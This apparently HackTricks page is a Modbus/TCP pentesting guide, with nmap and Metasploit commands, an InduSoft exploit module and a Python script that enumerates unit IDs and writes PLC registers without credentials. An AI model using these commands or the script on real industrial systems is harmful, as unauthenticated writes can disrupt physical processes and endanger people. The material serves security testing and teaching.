Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
Modbus was developed by Modicon in 1979 as a messaging structure for exchanging data between intelligent devices (PLCs, RTUs, HMIs, sensors) under a master-slave, or client-server, model: the client sends a request carrying a function code (1-4 read coils/inputs/registers, 5/6/15/16 write coils/registers) and the addressed server replies. Modbus/TCP wraps the original serial protocol in a 7-byte MBAP header (transaction ID, protocol ID, length, unit ID) sent over TCP port 502. The protocol has no authentication, integrity or encryption: any host that can reach the port can read and write process data on the device, so network reachability alone is the security boundary.
Default port: 502
PORT STATE SERVICE
502/tcp open modbus
Port Scanning
nmap
The first step in enumerating Modbus services is a port scan with nmap to identify hosts listening on 502/tcp. The modbus-discover NSE script (shown at the end of this page) goes one step further and enumerates unit IDs and device identification. Keep scan rates low: fragile PLCs can crash or drop their field connection when flooded with probes.
nmap -p 502 <target_ip>
Metasploit
Metasploit also provides modules for scanning Modbus services. The auxiliary/scanner/scada/modbusdetect module sends a Modbus/TCP request to each host and reports those that answer with a valid Modbus frame.
use auxiliary/scanner/scada/modbusdetect
set RHOSTS <target_ip>
run
Modbus Enumeration
Once the Modbus service is identified, the next step is to enumerate the unit IDs (slave IDs, 1-247) that answer behind the TCP endpoint (a gateway may front several serial devices) and the coil and register ranges each unit exposes. Exception responses (function code with the high bit set, followed by an exception code) tell you which addresses and function codes exist and which do not.
Modscan
ModScan32 is a popular Windows Modbus master used for enumeration. It is a GUI application: launch it, enter <target_ip> and port 502 in its connection dialog, then choose the point type (coils, discrete inputs, input registers, holding registers) and address range to poll and retrieve the register contents.
modscan32.exe
Metasploit
Metasploit also provides modules for Modbus enumeration. auxiliary/scanner/scada/modbus_findunitid sweeps unit IDs to find the ones a device responds for, and auxiliary/scanner/scada/modbusclient reads coils and registers (ACTION READ_COILS / READ_REGISTERS, with DATA_ADDRESS, NUMBER and UNIT_NUMBER selecting the range and unit).
use auxiliary/scanner/scada/modbus_findunitid
set RHOSTS <target_ip>
run
use auxiliary/scanner/scada/modbusclient
set RHOSTS <target_ip>
set ACTION READ_REGISTERS
set DATA_ADDRESS 0
set NUMBER 10
run
Modbus Exploitation
Once the Modbus units and registers are enumerated, exploitation usually needs no vulnerability at all: because the protocol has no authentication, any client can write coils and registers and thereby change setpoints, outputs or the state of the controlled process. Separately, bugs in particular Modbus stacks (malformed frames, oversized lengths) can crash or hang a device. Writes on a live system are destructive; only send them within the agreed scope and with the asset owner present.
Modbus Client
Any Modbus master/client utility can be used to interact with Modbus devices and send custom requests while analyzing the responses. Metasploit's auxiliary/scanner/scada/modbusclient module does this from the console; the example below writes the value 1 into holding register 0 of unit 1 (ACTION WRITE_COIL / WRITE_REGISTER, with DATA holding the value).
use auxiliary/scanner/scada/modbusclient
set RHOSTS <target_ip>
set ACTION WRITE_REGISTER
set UNIT_NUMBER 1
set DATA_ADDRESS 0
set DATA 1
run
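The following is an added example, not code from HackTricks or from any of the tools above. It ties together the three sections so far: the MBAP framing from Basic Information, the unit-ID sweep and register read from Modbus Enumeration, and the unauthenticated Write Single Register from Modbus Exploitation. Network I/O is replaced by a constructed in-memory device (FakePLC) whose register contents and "unreachable unit" behaviour are assumptions, so it runs offline; pointing `exchange` at a real socket is the only change needed to use it against a target.

```python
"""Build and parse Modbus/TCP frames, enumerate unit IDs, read and write
holding registers. Added example; FakePLC is a constructed stand-in."""
import struct

# Subset of exception codes from the Modbus Application Protocol spec.
EXCEPTIONS = {
    0x01: "ILLEGAL FUNCTION",
    0x02: "ILLEGAL DATA ADDRESS",
    0x03: "ILLEGAL DATA VALUE",
    0x04: "SLAVE DEVICE FAILURE",
    0x0A: "GATEWAY PATH UNAVAILABLE",
    0x0B: "GATEWAY TARGET DEVICE FAILED TO RESPOND",
}


def mbap(transaction_id, unit_id, pdu):
    """Prefix a PDU with the 7-byte MBAP header: tid(2) proto(2)=0 len(2) unit(1)."""
    return struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id) + pdu


def read_holding_registers(tid, unit_id, start, count):
    """Function 0x03: read `count` holding registers starting at `start`."""
    return mbap(tid, unit_id, struct.pack(">BHH", 0x03, start, count))


def write_single_register(tid, unit_id, address, value):
    """Function 0x06: write one 16-bit value. No authentication is involved."""
    return mbap(tid, unit_id, struct.pack(">BHH", 0x06, address, value))


def parse_response(frame):
    """Decode a Modbus/TCP response; exception replies set bit 7 of the function code."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0 or length != len(frame) - 6:
        raise ValueError("bad MBAP header")
    fc = frame[7]
    if fc & 0x80:
        code = frame[8]
        return {"tid": tid, "unit": unit, "function": fc & 0x7F,
                "exception": code, "error": EXCEPTIONS.get(code, "UNKNOWN")}
    if fc == 0x03:
        byte_count = frame[8]
        regs = struct.unpack(">%dH" % (byte_count // 2), frame[9:9 + byte_count])
        return {"tid": tid, "unit": unit, "function": fc, "registers": list(regs)}
    if fc == 0x06:  # success reply echoes address and value
        address, value = struct.unpack(">HH", frame[8:12])
        return {"tid": tid, "unit": unit, "function": fc, "address": address, "value": value}
    return {"tid": tid, "unit": unit, "function": fc, "data": frame[8:]}


class FakePLC:
    """Constructed device: unit 1 has four holding registers, other units are absent
    (answered with exception 0x0B as a Modbus gateway would)."""

    def __init__(self):
        self.registers = {1: [0x0000, 0x1234, 0x00FF, 0x0001]}

    def exchange(self, request):
        tid, _, _, unit = struct.unpack(">HHHB", request[:7])
        fc = request[7]
        if unit not in self.registers:
            return mbap(tid, unit, bytes([fc | 0x80, 0x0B]))
        regs = self.registers[unit]
        if fc == 0x03:
            start, count = struct.unpack(">HH", request[8:12])
            if start + count > len(regs):
                return mbap(tid, unit, bytes([0x83, 0x02]))
            data = struct.pack(">%dH" % count, *regs[start:start + count])
            return mbap(tid, unit, bytes([0x03, len(data)]) + data)
        if fc == 0x06:
            address, value = struct.unpack(">HH", request[8:12])
            if address >= len(regs):
                return mbap(tid, unit, bytes([0x86, 0x02]))
            regs[address] = value
            return mbap(tid, unit, request[7:12])
        return mbap(tid, unit, bytes([fc | 0x80, 0x01]))


def find_unit_ids(exchange, unit_ids=range(1, 248)):
    """Sweep unit IDs with a one-register read. Data, or any exception other than
    the gateway codes 0x0A/0x0B, means a device answered for that ID."""
    found = []
    for tid, unit in enumerate(unit_ids, start=1):
        resp = parse_response(exchange(read_holding_registers(tid, unit, 0, 1)))
        if "registers" in resp or resp.get("exception") not in (0x0A, 0x0B):
            found.append(unit)
    return found


if __name__ == "__main__":
    plc = FakePLC()
    print("live unit IDs:", find_unit_ids(plc.exchange))
    print(parse_response(plc.exchange(read_holding_registers(1, 1, 0, 4))))
    print(parse_response(plc.exchange(write_single_register(2, 1, 3, 0xBEEF))))
    print(parse_response(plc.exchange(read_holding_registers(3, 1, 100, 1))))
```

The request for four registers from unit 1 is the 12-byte frame 00 01 00 00 00 06 01 03 00 00 00 04, which is what you will see on the wire or in a Wireshark capture of the Metasploit modules above; the write has the same shape with function code 06. The unit-ID sweep treats 0x0A/0x0B as "nobody home" because gateways return those for unmapped serial addresses, while a real device that rejects address 0 still replies with 0x02 and thereby reveals itself.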
Metasploit
Metasploit also carries exploits for SCADA/HMI software that typically sits on the same network as Modbus devices. exploit/windows/scada/indusoft_webstudio_exec targets InduSoft Web Studio; it is not a Modbus protocol exploit and reaches the HMI through its own service, so it is only relevant when that product is present.
use exploit/windows/scada/indusoft_webstudio_exec
set RHOSTS <target_ip>
run
Conclusion
Enumeration is a crucial step in the Modbus pentesting process. By identifying open ports, enumerating unit IDs and registers, and then reading or writing process data (which the protocol allows without any credentials), it is possible to observe and alter the state of the devices a PLC controls.
Quick commands for Modbus detection and unit-ID enumeration:
nmap --script modbus-discover -p 502 <IP>
msf> use auxiliary/scanner/scada/modbusdetect
msf> use auxiliary/scanner/scada/modbus_findunitid